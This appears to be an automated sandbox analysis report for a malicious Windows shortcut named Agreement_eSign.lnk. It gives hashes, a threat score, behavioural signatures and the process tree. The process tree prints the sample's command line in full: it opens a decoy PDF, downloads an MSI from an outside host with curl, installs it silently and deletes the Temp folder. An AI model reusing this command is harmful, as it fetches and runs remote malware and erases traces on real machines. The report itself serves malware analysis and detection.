Analysis
-
max time kernel
120s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20240729-en -
resource tags
arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system -
submitted
24-12-2024 17:19
Static task
static1
Behavioral task
behavioral1
Sample
Agreement_eSign.lnk
Resource
win7-20240729-en
windows7-x64
3 signatures
150 seconds
Behavioral task
behavioral2
Sample
Agreement_eSign.lnk
Resource
win10v2004-20241007-en
windows10-2004-x64
23 signatures
150 seconds
General
-
Target
Agreement_eSign.lnk
-
Size
3KB
-
MD5
1e98bde2c12668b383a15f66d71f6d0c
-
SHA1
b0a96f44ca8109492285657118f35551c3266794
-
SHA256
1703be0db351262d9a327e98aa9df4fd33ff58b41c7ea0c7eb4587853e2cca0f
-
SHA512
fa30834bbd5711a7d1a454b427a1d314697dbef43adaf87ec32c54500c414af16df91ef2d462a2aa9f384a069b2bfb76f7a81c7a8726132f39fb211976caa17a
Score
7/10
Malware Config
Signatures
-
Deletes itself 1 IoCs
pid Process 2864 cmd.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 2188 wrote to memory of 2864 2188 cmd.exe 31 PID 2188 wrote to memory of 2864 2188 cmd.exe 31 PID 2188 wrote to memory of 2864 2188 cmd.exe 31
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\Agreement_eSign.lnk1⤵
- Suspicious use of WriteProcessMemory
PID:2188 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start msedge https://www.wto.org/english/docs_e/legal_e/27-trips.pdf & curl -sLo C:\Users\Admin\AppData\Local\Temp\82b377b2-9644-47c3-993b-d84cfb887a43.msi http://us5.info/upl/install.msi & C:\Users\Admin\AppData\Local\Temp\82b377b2-9644-47c3-993b-d84cfb887a43.msi /qn & del /q/f/s C:\Users\Admin\AppData\Local\Temp & exit2⤵
- Deletes itself
PID:2864
-